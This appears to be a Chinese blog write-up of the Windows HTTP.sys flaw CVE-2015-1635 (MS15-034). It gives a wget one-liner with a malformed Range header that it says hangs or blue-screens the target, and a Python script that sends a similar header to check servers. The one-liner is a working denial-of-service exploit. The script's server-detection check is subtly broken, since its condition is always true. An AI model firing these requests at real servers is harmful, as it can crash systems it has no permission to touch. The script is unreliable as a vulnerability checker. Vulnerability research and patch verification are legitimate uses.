HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。
成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
https://technet.microsoft.com/zh-cn/library/security/MS15-034
漏洞出来了POC,测试如下:
影响版本:
windows 2008 R2
windows sever 2012
windows 7
windows 8 8.1
安装IIS6.0以上。 (IIS version > 6.0)
HTTP.sys不懂其他地方用不用,所以暂时只了解影响WEB服务器。
测试POC:
系统必假死或者蓝屏:
wget --header="Range: bytes=18-18446744073709551615" http://192.168.200.49/welcome.png
https://github.com/yanyueoo7/TestOne/blob/master/CVE-2015-1635.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#date 2015/04/20
#The IIS Vul (CVE-2015-1635,MS15-034)Check Script.
#HTTP.sys Remote Code Execute.
import sys
import requests
def main():
ip_Str = sys.argv[1]
Check_CVE_2015_1635(ip_Str)
def Check_CVE_2015_1635(Ip_Str):
if Ip_Str:
Server_Tag = ['Microsoft-HTTP','Microsoft-IIS']
Tmp_Req_Url = str(''.join(['http://',Ip_Str]))
Request_Tmp = requests.get(Tmp_Req_Url)
remote_server = Request_Tmp.headers[ 'server']
if (tmp_tag in remote_server for tmp_tag in Server_Tag):
print("[+] Web Service Is " + remote_server)
MS15_034_Execute(Tmp_Req_Url)
else:
print("[+] Web Service Is Not IIS\n[+] May Be " + remote_server)
def MS15_034_Execute(domain):
print("[+] Start Checking...")
Req_headers = {'Host': 'stuff','Range': 'bytes=0-18446744073709551615'}
Request = requests.get(domain, headers=Req_headers)
if 'Requested Range Not Satisfiable' in Request.content:
print("[+] The HTTP.sys remote code execution vulnerability Is Exists!")
elif 'The request has an invalid header name' in Request.content:
print("[+] The vulnerability has been fixed!")
else:
print("[+] The IIS service was unable to display the vulnerability exists, the need for manual testing!")
if __name__ == '__main__':
main()